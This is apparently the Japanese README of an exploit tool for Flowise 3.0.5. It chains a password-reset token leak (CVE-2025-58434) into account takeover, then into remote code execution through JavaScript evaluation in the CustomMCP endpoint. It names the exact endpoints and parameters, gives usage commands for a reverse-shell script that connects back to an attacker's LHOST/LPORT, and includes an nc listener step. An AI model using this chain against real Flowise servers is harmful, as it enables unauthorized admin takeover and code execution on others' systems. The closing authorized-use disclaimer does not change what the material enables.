
Flowise 3.0.5 のエクスプロイトチェーン: パスワードリセットトークンの開示による未認証のアカウント乗っ取り (CVE-2025-58434) を、リモートコード実行のための CustomMCP JavaScript 評価に連鎖させます。
Flowise 3.0.5の2つの問題を連鎖させます:
POST /api/v1/account/forgot-password は、対象ユーザーの tempToken
をJSONレスポンスに直接返します。これを POST /api/v1/account/reset-password
に渡すことで、最初の管理者を含む任意のアカウントに既知のパスワードを設定できます -> 完全な
未認証アカウント乗っ取り。mcpServerConfig のサーバーサイドJavaScript評価。
セッションとワークスペースAPIキー(ステップ1から)を使用して、
POST /api/v1/node-load-method/customMCP に loadMethod=listActions を指定すると、
Flowiseプロセス内で mcpServerConfig 文字列がJavaScriptとして評価され、
require('child_process').exec() によるRCEが可能になります。(ここではATOをコード実行に変えるためだけに使用される別のFlowise問題です。執筆時点ではCVEは割り当てられていません。)CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - 完全な連鎖(ATO -> APIキー -> CustomMCPリバースシェル)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# `nc -lvnp <LPORT>` を準備しておいてください
flowise_customMCP_rce.py - CustomMCP RCEのみ(APIキーが必要)python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'
認可されたセキュリティテストおよび教育目的のみに使用してください。所有しているシステム、または明示的な書面による許可を得たシステムに対してのみ実行してください。
著者: r3vpwnx